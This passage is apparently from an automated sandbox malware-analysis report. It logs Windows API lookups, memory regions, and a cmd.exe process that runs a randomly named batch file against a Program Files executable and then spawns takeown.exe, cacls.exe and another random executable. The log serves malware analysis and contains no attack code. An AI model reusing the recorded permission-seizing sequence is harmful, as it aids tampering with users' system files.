| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x745d1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x745d1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x745d1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:03 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #95: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #95 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Portable Devices\restaurant.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:28, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Self Terminated |
| Monitor Duration | 00:00:33 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x974 |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
760
0x
4E8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000e40000 | 0x00e40000 | 0x00e5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e40000 | 0x00e40000 | 0x00e4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000e50000 | 0x00e50000 | 0x00e53fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00e61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00e63fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e70000 | 0x00e70000 | 0x00e83fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e90000 | 0x00e90000 | 0x00ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x00fcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000fd0000 | 0x00fd0000 | 0x00fd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000fe0000 | 0x00fe0000 | 0x00fe0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ff0000 | 0x00ff0000 | 0x00ff1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x01000000 | 0x010bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000010c0000 | 0x010c0000 | 0x010fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001100000 | 0x01100000 | 0x0110ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001150000 | 0x01150000 | 0x0115ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001160000 | 0x01160000 | 0x0136ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001160000 | 0x01160000 | 0x0125ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001270000 | 0x01270000 | 0x0136ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005420000 | 0x05420000 | 0x0559ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x055a0000 | 0x058d6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f730000 | 0x7f730000 | 0x7f82ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f830000 | 0x7f830000 | 0x7f852fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f858000 | 0x7f858000 | 0x7f85afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f85b000 | 0x7f85b000 | 0x7f85dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f85e000 | 0x7f85e000 | 0x7f85efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f85f000 | 0x7f85f000 | 0x7f85ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 84 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 63 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 21 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xff0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x930, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0xe54, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
